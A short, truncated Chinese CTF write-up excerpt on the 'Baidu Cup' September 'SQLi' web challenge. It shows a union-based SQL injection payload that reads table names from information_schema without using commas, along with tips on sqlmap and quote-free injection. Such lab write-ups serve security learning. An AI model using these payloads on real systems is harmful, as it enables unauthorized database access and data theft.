可以看到数据库名称为sqli 紧接着,构造payload,获取表名 -1' union select * from (select group_concat(distinct(table_name)) from information_schema.tables where table_schema='sqli') a join (select version() ) b %23 构造payload,获取字段名 -1' union select * from (select group_concat(distinc...
“百度杯”CTF比赛 九月场 类型:Web 题目名称:SQLi 收获的知识: 重定向一般发生在访问域名而且不加参数或者文件夹名,文件名这样的情况下 sql注入也要留意HTTP信息的变化 可以利用SQL map跑一下看看有没有有用的信息 不使用单引号和逗号的注入的注入技巧 发现页面空白 然后查看源文件 发现另一个页面 进去后出现 后...